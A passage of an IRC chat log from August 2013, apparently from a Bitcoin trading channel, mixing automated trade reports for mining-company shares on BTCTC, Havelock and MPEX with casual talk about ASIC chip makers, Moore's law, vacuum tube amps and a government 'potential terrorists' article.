0.00301 = 0.1355 BTC [-] Aug 28 05:25:04 [BTCTC] [LABCOIN] 1000 @ 0.002971 = 2.971 BTC [-] Aug 28 05:25:08 I run a jdm ecu and decat system to maximise emissions Aug 28 05:25:22 [BTCTC] [LABCOIN] 19 @ 0.00309 = 0.0587 BTC [+] Aug 28 05:25:58 [BTCTC] [LABCOIN] 1500 @ 0.002972 = 4.458 BTC [-] Aug 28 05:26:00 [HAVELOCK] [LABCO] 24 @ 0.003279 = 0.0787 BTC [+] Aug 28 05:26:01 Well my car doesn't have any problems, but you still have to get it tested no matter what Aug 28 05:26:02 [BTCTC] [ACTIVEMINING] 888 @ 0.005016 = 4.4542 BTC [+] Aug 28 05:26:26 half the pipe is hanging loose atm too Aug 28 05:26:35 they;d probably shit at the noise in your state Aug 28 05:26:43 this is how dub got his ecu on his honda civic : http://honda-tech.com/showthread.php?t=3035366 Aug 28 05:27:28 lol Aug 28 05:27:39 Sometimes I hate Georgia Aug 28 05:31:12 [BTCTC] [BTC-BOND] 5 @ 0.009995 = 0.05 BTC [-] Aug 28 05:31:14 [BTCTC] [LABCOIN] 3017 @ 0.002915 = 8.7946 BTC [-] Aug 28 05:31:15 [BTCTC] [BASIC-MINING] 5 @ 0.206 = 1.03 BTC [-] Aug 28 05:31:29 [BTCTC] [BASIC-MINING] 1 @ 0.206 BTC [-] Aug 28 05:31:30 [BTCTC] [LABCOIN] 1033 @ 0.002915 = 3.0112 BTC [-] Aug 28 05:31:31 [BTCTC] [BASIC-MINING] 2 @ 0.2012 = 0.4024 BTC [-] Aug 28 05:31:33 [BTCTC] [LABCOIN] 795 @ 0.0029 = 2.3055 BTC [-] Aug 28 05:31:34 [BTCTC] [BASIC-MINING] 11 @ 0.2005 = 2.2055 BTC [-] Aug 28 05:31:36 [BTCTC] [LABCOIN] 50 @ 0.0029 = 0.145 BTC [-] Aug 28 05:31:39 [BTCTC] [LABCOIN] 2000 @ 0.0029 = 5.8 BTC [-] Aug 28 05:31:51 [BTCTC] [LABCOIN] 1700 @ 0.0029 = 4.93 BTC [-] Aug 28 05:32:01 [BTCTC] [LABCOIN] 300 @ 0.003 = 0.9 BTC [+] Aug 28 05:32:21 [BTCTC] [LABCOIN] 198 @ 0.002915 = 0.5772 BTC [-] Aug 28 05:33:47 Anything good on tv tonight? Aug 28 05:35:02 what is tv? Aug 28 05:35:49 [BTCTC] [LABCOIN] 2 @ 0.003 = 0.006 BTC [+] Aug 28 05:36:44 [BTCTC] [LABCOIN] 100 @ 0.002811 = 0.2811 BTC [-] Aug 28 05:36:46 [BTCTC] [LABCOIN] 200 @ 0.00281 = 0.562 BTC [-] Aug 28 05:36:47 [BTCTC] [LABCOIN] 2000 @ 0.002806 = 5.612 BTC [-] Aug 28 05:36:48 [BTCTC] [LABCOIN] 1781 @ 0.002805 = 4.9957 BTC [-] Aug 28 05:37:26 [MPEX] [S.MPOE] 2900 @ 0.00087665 = 2.5423 BTC [-] Aug 28 05:44:08 [BTCTC] [LABCOIN] 200 @ 0.002812 = 0.5624 BTC [+] Aug 28 05:44:10 [BTCTC] [LABCOIN] 1245 @ 0.002811 = 3.4997 BTC [-] Aug 28 05:44:11 [BTCTC] [LABCOIN] 1200 @ 0.002811 = 3.3732 BTC [-] Aug 28 05:44:11 [BTCTC] [LABCOIN] 1655 @ 0.00281 = 4.6506 BTC [-] Aug 28 05:44:13 [BTCTC] [LABCOIN] 1000 @ 0.00281 = 2.81 BTC [-] Aug 28 05:44:14 [BTCTC] [LABCOIN] 2000 @ 0.002806 = 5.612 BTC [-] Aug 28 05:44:15 [BTCTC] [LABCOIN] 1969 @ 0.002805 = 5.523 BTC [-] Aug 28 05:44:16 [BTCTC] [LABCOIN] 2000 @ 0.002804 = 5.608 BTC [-] Aug 28 05:44:17 [BTCTC] [LABCOIN] 2000 @ 0.002803 = 5.606 BTC [-] Aug 28 05:44:18 [BTCTC] [LABCOIN] 2000 @ 0.002801 = 5.602 BTC [-] Aug 28 05:44:19 [BTCTC] [LABCOIN] 80 @ 0.00278 = 0.2224 BTC [-] Aug 28 05:44:21 [BTCTC] [LABCOIN] 5957 @ 0.002702 = 16.0958 BTC [-] Aug 28 05:44:22 [BTCTC] [LABCOIN] 500 @ 0.002701 = 1.3505 BTC [-] Aug 28 05:44:22 [BTCTC] [LABCOIN] 15 @ 0.0027 = 0.0405 BTC [-] Aug 28 05:44:23 [BTCTC] [LABCOIN] 1000 @ 0.0027 = 2.7 BTC [-] Aug 28 05:44:24 [BTCTC] [LABCOIN] 200 @ 0.0027 = 0.54 BTC [-] Aug 28 05:44:25 [BTCTC] [LABCOIN] 2400 @ 0.002674 = 6.4176 BTC [-] Aug 28 05:44:26 [BTCTC] [LABCOIN] 793 @ 0.002672 = 2.1189 BTC [-] Aug 28 05:44:34 [BTCTC] [LABCOIN] 4207 @ 0.002672 = 11.2411 BTC [-] Aug 28 05:44:35 [BTCTC] [LABCOIN] 4960 @ 0.002672 = 13.2531 BTC [-] Aug 28 05:44:47 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [+] Aug 28 05:44:49 [BTCTC] [ASICMINER-PT] 3 @ 2.53 = 7.59 BTC [+] Aug 28 05:49:45 Yes, well when markets are failing to even be coherent (well at least to the observer anyway, price movements are always related to human decisions, it just can be hard to foresee those at times), no need to randomly gamble your money away. Aug 28 05:49:59 Work on actual businesses and stash money away Aug 28 05:50:26 Fortunatly BTC is not fiat Aug 28 05:50:58 [BTCTC] [LABCOIN] 300 @ 0.0027 = 0.81 BTC [+] Aug 28 05:51:12 [BTCTC] [LABCOIN] 2 @ 0.0027 = 0.0054 BTC [+] Aug 28 05:51:27 [BTCTC] [LABCOIN] 950 @ 0.0027 = 2.565 BTC [+] Aug 28 05:52:17 http://thetruthwins.com/archives/72-types-of-americans-that-are-considered-potential-terrorists-in-official-government-documents Aug 28 05:52:20 72 Types Of Americans That Are Considered “Potential Terrorists” In Official Government Document Aug 28 05:52:22 Labcoin going back where it came from... Aug 28 05:52:22 pretty list with links in there. Aug 28 05:55:05 [BTCTC] [HOSTED-MINING] 10 @ 0.002798 = 0.028 BTC [+] Aug 28 05:55:53 [BTCTC] [LABCOIN] 300 @ 0.002702 = 0.8106 BTC [+] Aug 28 05:56:09 [BTCTC] [DMS.SELLING] 2 @ 0.01223 = 0.0245 BTC [-] Aug 28 05:56:11 [BTCTC] [DMS.SELLING] 344 @ 0.01222 = 4.2037 BTC [-] Aug 28 05:56:26 [BTCTC] [LABCOIN] 200 @ 0.002703 = 0.5406 BTC [+] Aug 28 05:56:27 [BTCTC] [LABCOIN] 50 @ 0.002702 = 0.1351 BTC [-] Aug 28 05:56:32 [HAVELOCK] [XBOND] 350 @ 0.00113001 = 0.3955 BTC [-] Aug 28 05:56:36 [BTCTC] [HOSTED-MINING] 28 @ 0.002798 = 0.0783 BTC [+] Aug 28 05:56:51 [BTCTC] [DMS.SELLING] 264 @ 0.0122 = 3.2208 BTC [-] Aug 28 05:57:45 [BTCTC] [LABCOIN] 200 @ 0.00271 = 0.542 BTC [+] Aug 28 05:58:27 [BTCTC] [HOSTED-MINING] 10 @ 0.002798 = 0.028 BTC [+] Aug 28 05:58:28 [BTCTC] [LABCOIN] 740 @ 0.002712 = 2.0069 BTC [+] Aug 28 05:59:42 [BTCTC] [ACTIVEMINING] 13 @ 0.00502 = 0.0653 BTC [+] Aug 28 06:00:41 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [-] Aug 28 06:00:43 [BTCTC] [LABCOIN] 10 @ 0.002977 = 0.0298 BTC [+] Aug 28 06:01:28 [HAVELOCK] [AM100] 15 @ 0.02489 = 0.3734 BTC [-] Aug 28 06:01:45 [BTCTC] [HOSTED-MINING] 1 @ 0.002798 BTC [+] Aug 28 06:02:40 wow, i cant believe there arent like 20 types i fall into Aug 28 06:02:41 [BTCTC] [LABCOIN] 16 @ 0.002968 = 0.0475 BTC [-] Aug 28 06:02:57 maybe the nsa doesnt know i exist Aug 28 06:03:34 [BTCTC] [LABCOIN] 184 @ 0.002968 = 0.5461 BTC [-] Aug 28 06:03:35 [BTCTC] [LABCOIN] 775 @ 0.002977 = 2.3072 BTC [+] Aug 28 06:03:36 [BTCTC] [LABCOIN] 100 @ 0.002978 = 0.2978 BTC [+] Aug 28 06:03:38 [BTCTC] [LABCOIN] 3000 @ 0.00298 = 8.94 BTC [+] Aug 28 06:03:39 [BTCTC] [LABCOIN] 250 @ 0.002989 = 0.7473 BTC [+] Aug 28 06:03:40 [BTCTC] [LABCOIN] 300 @ 0.00299 = 0.897 BTC [+] Aug 28 06:03:40 [BTCTC] [LABCOIN] 1700 @ 0.00299 = 5.083 BTC [+] Aug 28 06:03:41 [BTCTC] [LABCOIN] 463 @ 0.002999 = 1.3885 BTC [+] Aug 28 06:03:42 [BTCTC] [LABCOIN] 1028 @ 0.003 = 3.084 BTC [+] Aug 28 06:03:47 notably no bitcoin. Aug 28 06:04:28 yeah but where is the list they dont want us to see! Aug 28 06:04:55 [BTCTC] [LABCOIN] 259 @ 0.002999 = 0.7767 BTC [-] Aug 28 06:05:05 [BTCTC] [LABCOIN] 10 @ 0.002999 = 0.03 BTC [-] Aug 28 06:05:20 Well I'm following links and it's slightly exagerated. But yeah, it denotes and aversion for anything that remotely looks like trouble. Aug 28 06:05:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.02687 = 0.0537 BTC [+] Aug 28 06:05:39 Still funny tho Aug 28 06:05:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.0249 = 0.0747 BTC [-] Aug 28 06:06:28 [BTCTC] [HOSTED-MINING] 3 @ 0.002798 = 0.0084 BTC [+] Aug 28 06:07:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.02488 = 0.0746 BTC [-] Aug 28 06:07:22 [BTCTC] [HOSTED-MINING] 5 @ 0.002798 = 0.014 BTC [+] Aug 28 06:07:38 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] Aug 28 06:07:52 i think most notable is the very prominent self-centerdness of the entire thing Aug 28 06:08:15 it's not as much a list of what the govt perceives as threaths, as a list of pats on the back for a bunch of old people that indeed someone still gives a shit Aug 28 06:09:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.02687 = 0.1344 BTC [+] Aug 28 06:09:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02688 BTC [+] Aug 28 06:09:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.02688 = 0.4032 BTC [+] Aug 28 06:09:55 [BTCTC] [TAT.ASICMINER] 29 @ 0.02688 = 0.7795 BTC [+] Aug 28 06:10:34 [BTCTC] [LABCOIN] 462 @ 0.002997 = 1.3846 BTC [-] Aug 28 06:10:35 [BTCTC] [LABCOIN] 2620 @ 0.002998 = 7.8548 BTC [+] Aug 28 06:10:36 [BTCTC] [LABCOIN] 627 @ 0.003 = 1.881 BTC [+] Aug 28 06:10:37 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 28 06:10:39 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 28 06:10:40 [BTCTC] [LABCOIN] 250 @ 0.003 = 0.75 BTC [+] Aug 28 06:11:13 Yes, pretty much. Aug 28 06:11:24 [BTCTC] [HOSTED-MINING] 1 @ 0.002798 BTC [+] Aug 28 06:11:36 [BTCTC] [LABCOIN] 200 @ 0.003135 = 0.627 BTC [+] Aug 28 06:11:37 [BTCTC] [LABCOIN] 2400 @ 0.003136 = 7.5264 BTC [+] Aug 28 06:11:39 [BTCTC] [LABCOIN] 125 @ 0.003139 = 0.3924 BTC [+] Aug 28 06:11:40 [BTCTC] [LABCOIN] 502 @ 0.00314 = 1.5763 BTC [+] Aug 28 06:12:10 [MPEX] [S.MPOE] 4294 @ 0.00087665 = 3.7643 BTC [-] Aug 28 06:12:12 [MPEX] [S.MPOE] 5587 @ 0.0008786 = 4.9087 BTC [+] Aug 28 06:18:10 [BTCTC] [HOSTED-MINING] 5 @ 0.002798 = 0.014 BTC [+] Aug 28 06:19:13 [BTCTC] [LABCOIN] 2000 @ 0.003238 = 6.476 BTC [+] Aug 28 06:20:02 [BTCTC] [LABCOIN] 1000 @ 0.0032 = 3.2 BTC [-] Aug 28 06:20:24 [BTCTC] [ASICMINER-PT] 1 @ 2.564 BTC [+] Aug 28 06:20:26 [BTCTC] [ASICMINER-PT] 1 @ 2.565 BTC [+] Aug 28 06:20:27 [BTCTC] [ASICMINER-PT] 2 @ 2.57 = 5.14 BTC [+] Aug 28 06:20:29 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [+] Aug 28 06:21:51 [HAVELOCK] [LABCO] 26 @ 0.003279 = 0.0853 BTC [+] Aug 28 06:24:56 [BTCTC] [ASICMINER-PT] 2 @ 2.588 = 5.176 BTC [+] Aug 28 06:25:11 [BTCTC] [DMS.MINING] 275 @ 0.003348 = 0.9207 BTC [+] Aug 28 06:25:13 [BTCTC] [DMS.MINING] 3 @ 0.003347 = 0.01 BTC [-] Aug 28 06:25:14 [BTCTC] [DMS.MINING] 502 @ 0.003347 = 1.6802 BTC [-] Aug 28 06:25:15 [BTCTC] [DMS.MINING] 722 @ 0.003346 = 2.4158 BTC [-] Aug 28 06:25:17 [BTCTC] [DMS.MINING] 852 @ 0.003346 = 2.8508 BTC [-] Aug 28 06:27:51 [MPEX] [S.MPOE] 9500 @ 0.00088 = 8.36 BTC [+] Aug 28 06:28:13 [BTCTC] [LABCOIN] 85 @ 0.003001 = 0.2551 BTC [-] Aug 28 06:28:15 [BTCTC] [LABCOIN] 10000 @ 0.003 = 30 BTC [-] Aug 28 06:28:16 [BTCTC] [LABCOIN] 6222 @ 0.003 = 18.666 BTC [-] Aug 28 06:28:26 [HAVELOCK] [AM100] 19 @ 0.02489 = 0.4729 BTC [-] Aug 28 06:28:34 [HAVELOCK] [AM100] 70 @ 0.0249 = 1.743 BTC [+] Aug 28 06:31:25 [BTCTC] [DMS.MINING] 65 @ 0.003549 = 0.2307 BTC [+] Aug 28 06:32:48 [BTCTC] [LABCOIN] 90 @ 0.003001 = 0.2701 BTC [+] Aug 28 06:32:49 [BTCTC] [LABCOIN] 1788 @ 0.003 = 5.364 BTC [-] Aug 28 06:33:00 [BTCTC] [ASICMINER-PT] 1 @ 2.587 BTC [-] Aug 28 06:33:02 [BTCTC] [LABCOIN] 90 @ 0.003 = 0.27 BTC [-] Aug 28 06:35:55 [BTCTC] [LABCOIN] 46 @ 0.002941 = 0.1353 BTC [-] Aug 28 06:35:58 [BTCTC] [LABCOIN] 46 @ 0.00294 = 0.1352 BTC [-] Aug 28 06:36:00 [BTCTC] [LABCOIN] 5 @ 0.002915 = 0.0146 BTC [-] Aug 28 06:36:03 [BTCTC] [LABCOIN] 1990 @ 0.002902 = 5.775 BTC [-] Aug 28 06:36:50 [BTCTC] [LABCOIN] 7 @ 0.002995 = 0.021 BTC [+] Aug 28 06:37:20 [BTCTC] [LABCOIN] 3 @ 0.002995 = 0.009 BTC [+] Aug 28 06:37:21 [BTCTC] [LABCOIN] 530 @ 0.002826 = 1.4978 BTC [-] Aug 28 06:37:22 [BTCTC] [LABCOIN] 467 @ 0.002825 = 1.3193 BTC [-] Aug 28 06:38:05 [HAVELOCK] [AM100] 100 @ 0.0225 = 2.25 BTC [-] Aug 28 06:40:18 does asicminer have any realistic hope of regaining their foothold on the hashing power? Aug 28 06:41:00 I think it would be pretty hard, especially with Cointerra looming Aug 28 06:41:34 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] Aug 28 06:41:36 [BTCTC] [ASICMINER-PT] 1 @ 2.584 BTC [+] Aug 28 06:41:37 [BTCTC] [ASICMINER-PT] 3 @ 2.585 = 7.755 BTC [+] Aug 28 06:41:39 [BTCTC] [HOSTED-MINING] 2 @ 0.002798 = 0.0056 BTC [+] Aug 28 06:42:39 [HAVELOCK] [HIM] 3 @ 0.208 = 0.624 BTC [-] Aug 28 06:42:46 [HAVELOCK] [HIM] 7 @ 0.20900008 = 1.463 BTC [+] Aug 28 06:44:31 [HAVELOCK] [XBOND] 1 @ 0.00125 BTC [+] Aug 28 06:44:57 [BTCTC] [DMS.MINING] 1 @ 0.003549 BTC [+] Aug 28 06:45:24 [BTCTC] [ASICMINER-PT] 2 @ 2.58 = 5.16 BTC [-] Aug 28 06:45:28 [BTCTC] [LABCOIN] 473 @ 0.002991 = 1.4147 BTC [+] Aug 28 06:45:51 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] Aug 28 06:45:54 [HAVELOCK] [XBOND] 1 @ 0.00125 BTC [+] Aug 28 06:45:58 [BTCTC] [ASICMINER-PT] 1 @ 2.507 BTC [-] Aug 28 06:46:44 [HAVELOCK] [XBOND] 1 @ 0.00125 BTC [+] Aug 28 06:47:15 Urushiol how did you pick cointerra ? Aug 28 06:47:30 the bitfury ppl are actually delivering, even bfl is delivering, these are actual chips. Aug 28 06:47:39 dartboard Aug 28 06:48:00 [BTCTC] [LABCOIN] 4051 @ 0.002989 = 12.1084 BTC [-] Aug 28 06:48:01 [BTCTC] [LABCOIN] 45 @ 0.002994 = 0.1347 BTC [+] Aug 28 06:48:02 [BTCTC] [LABCOIN] 550 @ 0.002995 = 1.6473 BTC [+] Aug 28 06:48:04 [BTCTC] [LABCOIN] 1352 @ 0.002999 = 4.0546 BTC [+] Aug 28 06:48:05 [BTCTC] [LABCOIN] 5411 @ 0.003 = 16.233 BTC [+] Aug 28 06:48:06 [BTCTC] [LABCOIN] 1012 @ 0.003 = 3.036 BTC [+] Aug 28 06:48:53 [BTCTC] [LABCOIN] 92 @ 0.003139 = 0.2888 BTC [+] Aug 28 06:49:00 lolk. Aug 28 06:49:45 my BFL region is masked with sheet metal Aug 28 06:51:15 haha Aug 28 06:51:36 anyway, has anyone even done a sum of all promised hashing this year ? just for lulz if nothing else. Aug 28 06:51:50 [BTCTC] [LABCOIN] 1 @ 0.002989 BTC [-] Aug 28 06:52:07 About 10 ph Aug 28 06:52:26 [BTCTC] [LABCOIN] 38 @ 0.003001 = 0.114 BTC [+] Aug 28 06:52:28 [BTCTC] [LABCOIN] 62 @ 0.003 = 0.186 BTC [-] Aug 28 06:52:38 I actually considered that last night but decided to watch Breaking Bad instead Aug 28 06:52:45 about 8ph next 5months Aug 28 06:52:45 [BTCTC] [LABCOIN] 85 @ 0.003098 = 0.2633 BTC [+] Aug 28 06:52:46 [BTCTC] [LABCOIN] 250 @ 0.003099 = 0.7748 BTC [+] Aug 28 06:52:47 [BTCTC] [LABCOIN] 340 @ 0.0031 = 1.054 BTC [+] Aug 28 06:52:48 [BTCTC] [LABCOIN] 25 @ 0.003 = 0.075 BTC [-] Aug 28 06:52:52 [BTCTC] [LABCOIN] 13 @ 0.003 = 0.039 BTC [-] Aug 28 06:52:59 userioao the wow. Aug 28 06:53:13 the wow indeed Aug 28 06:53:29 15x ? i wonder if this will become the law of bitcoin Aug 28 06:53:51 "at any point, the sum total of all projects promising to add hashpower will equal ~15 times the current hash power" Aug 28 06:54:13 ofc it's based on mostly air right now Aug 28 06:54:28 better than moore's law Aug 28 06:54:34 we could call it "the 'more' law" Aug 28 06:54:37 That is saying 28nm is 100x better than 65 NM , which I do not think is correct Aug 28 06:54:40 [MPEX] [S.MPOE] 500 @ 0.00088 = 0.44 BTC [+] Aug 28 06:54:41 [BTCTC] [LABCOIN] 14 @ 0.003099 = 0.0434 BTC [+] Aug 28 06:54:41 [MPEX] [S.MPOE] 8038 @ 0.0008805 = 7.0775 BTC [+] Aug 28 06:54:52 [MPEX] [S.MPOE] 562 @ 0.00088163 = 0.4955 BTC [+] Aug 28 06:55:07 incidentally, http://upload.wikimedia.org/wikipedia/commons/0/00/Transistor_Count_and_Moore's_Law_-_2011.svg Aug 28 06:55:30 possibly the best fit of any linear expression to an observable phenomena Aug 28 06:56:24 [BTCTC] [ACTIVEMINING] 4 @ 0.0052 = 0.0208 BTC [+] Aug 28 06:57:01 transistors lol Aug 28 06:57:14 do you have old ass transistors mircea popescu? Aug 28 06:57:17 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Aug 28 06:57:28 yeah. Aug 28 06:57:32 one of the privaleges of being old :P Aug 28 06:57:38 I wonder if "moore's law" didn't exist if semiconductor advances might have advanced more quickly Aug 28 06:57:44 im not THAT old. the transistor's older than me. Aug 28 06:57:49 lolol Aug 28 06:57:54 vacuum tubes yo Aug 28 06:58:42 [BTCTC] [LABCOIN] 85 @ 0.003092 = 0.2628 BTC [-] Aug 28 06:58:43 [BTCTC] [LABCOIN] 15 @ 0.003093 = 0.0464 BTC [+] Aug 28 06:59:02 my grandparents had vacuum tubes shit in the house. Aug 28 06:59:10 imo the sound had a distinct, and pleasant quality. Aug 28 06:59:32 I'll agree with that Aug 28 06:59:35 expensive as shit though Aug 28 06:59:36 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Aug 28 06:59:37 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Aug 28 06:59:44 they were using the x86 assembly language for 2/3rds of that chard Aug 28 06:59:46 chart* Aug 28 06:59:53 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Aug 28 07:01:05 [BTCTC] [HOSTED-MINING] 35 @ 0.002798 = 0.0979 BTC [+] Aug 28 07:01:33 [BTCTC] [LABCOIN] 85 @ 0.003001 = 0.2551 BTC [-] Aug 28 07:01:38 [HAVELOCK] [XBOND] 1 @ 0.00125 BTC [+] Aug 28 07:01:40 [BTCTC] [LABCOIN] 500 @ 0.003 = 1.5 BTC [-] Aug 28 07:02:05 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Aug 28 07:02:48 [BTCTC] [LABCOIN] 555 @ 0.002914 = 1.6173 BTC [-] Aug 28 07:02:55 [BTCTC] [HOSTED-MINING] 46 @ 0.002799 = 0.1288 BTC [+] Aug 28 07:03:30 [BTCTC] [LABCOIN] 145 @ 0.002915 = 0.4227 BTC [+] Aug 28 07:03:33 [BTCTC] [LABCOIN] 388 @ 0.003093 = 1.2001 BTC [+] Aug 28 07:03:34 [BTCTC] [LABCOIN] 237 @ 0.003094 = 0.7333 BTC [+] Aug 28 07:05:56 jborkl on the other hand, i suspect the designs are yet very crude and as more bright lads look upon the matter we might see significant efficiency gains Aug 28 07:06:11 so it wouldn't be a 28nm that's 100x better than 65nm per se Aug 28 07:06:45 but a serious, multi-million mask made for 28nm is better than a rushed 65nm whatever. Aug 28 07:06:52 that is exactly true Aug 28 07:07:16 and unless you're bfl, you're not making 28nm mockery runs. if you're spending 10mn on the run tyou're also spending 10mn on engineering for the run Aug 28 07:07:39 helveticoin did 28nm on spare wafer space Aug 28 07:08:44 [BTCTC] [LABCOIN] 1 @ 0.003088 BTC [-] Aug 28 07:09:44 well broadly speaking Aug 28 07:10:06 [BTCTC] [HOSTED-MINING] 1 @ 0.002799 BTC [+] Aug 28 07:10:39 I've got friends that only buy vacume tube amps Aug 28 07:10:49 audiophiles Aug 28 07:11:13 [HAVELOCK] [AM100] 4 @ 0.023 = 0.092 BTC [+] Aug 28 07:11:25 guitar amps that they proceed to play death metal with Aug 28 07:11:27 I have vacuum tube amps and only listen to 128kbs transcodes of flacs Aug 28 07:11:33 [BTCTC] [BASIC-MINING] 1 @ 0.21 BTC [+] Aug 28 07:11:48 [BTCTC] [LABCOIN] 4571 @ 0.002921 = 13.3519 BTC [-] Aug 28 07:12:00 [BTCTC] [LABCOIN] 1250 @ 0.00292 = 3.65 BTC [-] Aug 28 07:12:02 [BTCTC] [LABCOIN] 410 @ 0.002915 = 1.1952 BTC [-] Aug 28 07:12:03 [BTCTC] [LABCOIN] 555 @ 0.002913 = 1.6167 BTC [-] Aug 28 07:12:33 [BTCTC] [NASTY-PT] 100 @ 0.002099 = 0.2099 BTC [-] Aug 28 07:13:25 [BTCTC] [HOSTED-MINING] 25 @ 0.002799 = 0.07 BTC [+] Aug 28 07:13:35 [BTCTC] [BTC-TRADING-PT] 2 @ 1.06 = 2.12 BTC [-] Aug 28 07:13:58 [BTCTC] [LABCOIN] 138 @ 0.003084 = 0.4256 BTC [+] Aug 28 07:13:59 [BTCTC] [LABCOIN] 555 @ 0.003085 = 1.7122 BTC [+] Aug 28 07:14:01 [BTCTC] [LABCOIN] 129 @ 0.003091 = 0.3987 BTC [+] Aug 28 07:14:02 [BTCTC] [LABCOIN] 1178 @ 0.003092 = 3.6424 BTC [+] Aug 28 07:16:25 helveticoin? Aug 28 07:16:27 da fuck is that Aug 28 07:17:18 [MPEX] [S.MPOE] 3819 @ 0.00087911 = 3.3573 BTC [-] Aug 28 07:17:19 [MPEX] [S.MPOE] 8253 @ 0.00087906 = 7.2549 BTC [-] Aug 28 07:18:33 like a swimsuit? Aug 28 07:18:51 http://www.swiss-miss.com/2011/04/helveticons.html Aug 28 07:18:54 swissmiss | Helveticons Aug 28 07:19:52 [BTCTC] [HOSTED-MINING] 4 @ 0.002799 = 0.0112 BTC [+] Aug 28 07:20:21 ;;google bitbet.us there will be blood Aug 28 07:20:22 BitBet - There will be blood: ; BitBet: ; Bitfunder down? - Bitcoin Forum: Aug 28 07:20:53 Well I am going to make a 11nm chip that runs at 5ph , so game over bitches Aug 28 07:21:28 The whole network is mine, as shit that means it is worthless Aug 28 07:22:00 Damn I wish I had thought of that before I made the mask in the garage Aug 28 07:22:15 lolk Aug 28 07:22:30 going off to make my 9nm dream chip. Aug 28 07:22:35 everybody wants to be wozniak **** BEGIN LOGGING AT Wed Aug 28 15:55:38 2013 Aug 28 15:55:38 [BTCTC] [LABCOIN] 515 @ 0.00302 = 1.5553 BTC [-] Aug 28 15:55:39 [BTCTC] [LABCOIN] 100 @ 0.003015 = 0.3015 BTC [-] Aug 28 15:55:59 [BTCTC] [ACTIVEMINING] 5 @ 0.005 = 0.025 BTC [-] Aug 28 15:56:14 [BTCTC] [LABCOIN] 100 @ 0.003012 = 0.3012 BTC [-] Aug 28 15:56:15 [BTCTC] [LABCOIN] 7984 @ 0.003012 = 24.0478 BTC [-] Aug 28 15:56:17 [BTCTC] [LABCOIN] 1500 @ 0.003012 = 4.518 BTC [-] Aug 28 15:56:28 [BTCTC] [ACTIVEMINING] 600 @ 0.004953 = 2.9718 BTC [-] Aug 28 15:56:28 [BTCTC] [LABCOIN] 3332 @ 0.003012 = 10.036 BTC [-] Aug 28 15:56:52 [BTCTC] [LABCOIN] 7184 @ 0.003012 = 21.6382 BTC [-] Aug 28 15:57:22 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [+] Aug 28 15:57:42 [BTCTC] [LABCOIN] 600 @ 0.00302 = 1.812 BTC [+] Aug 28 15:57:44 [BTCTC] [LABCOIN] 500 @ 0.00302 = 1.51 BTC [+] Aug 28 15:57:45 [BTCTC] [LABCOIN] 150 @ 0.003011 = 0.4517 BTC [-] Aug 28 15:57:46 [BTCTC] [LABCOIN] 2001 @ 0.003 = 6.003 BTC [-] Aug 28 15:57:47 [BTCTC] [ACTIVEMINING] 1666 @ 0.004953 = 8.2517 BTC [-] Aug 28 15:57:49 [BTCTC] [ACTIVEMINING] 850 @ 0.00495 = 4.2075 BTC [-] Aug 28 15:57:50 [BTCTC] [ACTIVEMINING] 581 @ 0.0049 = 2.8469 BTC [-] Aug 28 15:57:59 [MPEX] [S.MPOE] 3046 @ 0.00087322 = 2.6598 BTC [-] Aug 28 15:58:01 [MPEX] [S.MPOE] 2010 @ 0.00087314 = 1.755 BTC [-] Aug 28 15:58:06 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [-] Aug 28 15:58:16 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Aug 28 15:59:26 [BTCTC] [TAT.ASICMINER] 8 @ 0.02758 = 0.2206 BTC [+] Aug 28 15:59:28 [BTCTC] [TAT.ASICMINER] 15 @ 0.0276 = 0.414 BTC [+] Aug 28 15:59:39 http://i.imgur.com/2fqneNV.jpg Aug 28 15:59:42 check out that sexy Aug 28 15:59:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.02783 = 0.0835 BTC [+] Aug 28 16:00:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02783 BTC [+] Aug 28 16:01:07 [HAVELOCK] [AM1] 3 @ 2.7 = 8.1 BTC [+] Aug 28 16:01:12 [BTCTC] [DMS.MINING] 61 @ 0.00355 = 0.2166 BTC [+] Aug 28 16:01:30 [BTCTC] [TAT.ASICMINER] 38 @ 0.02783 = 1.0575 BTC [+] Aug 28 16:01:31 [BTCTC] [ACTIVEMINING] 68 @ 0.004816 = 0.3275 BTC [-] Aug 28 16:01:33 [BTCTC] [ACTIVEMINING] 115 @ 0.004815 = 0.5537 BTC [-] Aug 28 16:01:34 [BTCTC] [ACTIVEMINING] 2621 @ 0.00481 = 12.607 BTC [-] Aug 28 16:01:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02783 BTC [+] Aug 28 16:02:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.02783 = 0.1113 BTC [+] Aug 28 16:03:20 [BTCTC] [BASIC-MINING] 4 @ 0.213 = 0.852 BTC [+] Aug 28 16:03:44 is that a bitfury thing? Aug 28 16:04:40 Labcoin back at .003 Aug 28 16:05:35 [BTCTC] [ASICMINER-PT] 5 @ 2.85 = 14.25 BTC [+] Aug 28 16:05:36 [BTCTC] [ASICMINER-PT] 8 @ 2.86 = 22.88 BTC [+] Aug 28 16:05:38 [BTCTC] [ASICMINER-PT] 10 @ 2.87 = 28.7 BTC [+] Aug 28 16:06:19 [BTCTC] [TAT.ASICMINER] 8 @ 0.02782 = 0.2226 BTC [-] Aug 28 16:06:29 [BTCTC] [ASICMINER-PT] 7 @ 2.876 = 20.132 BTC [+] Aug 28 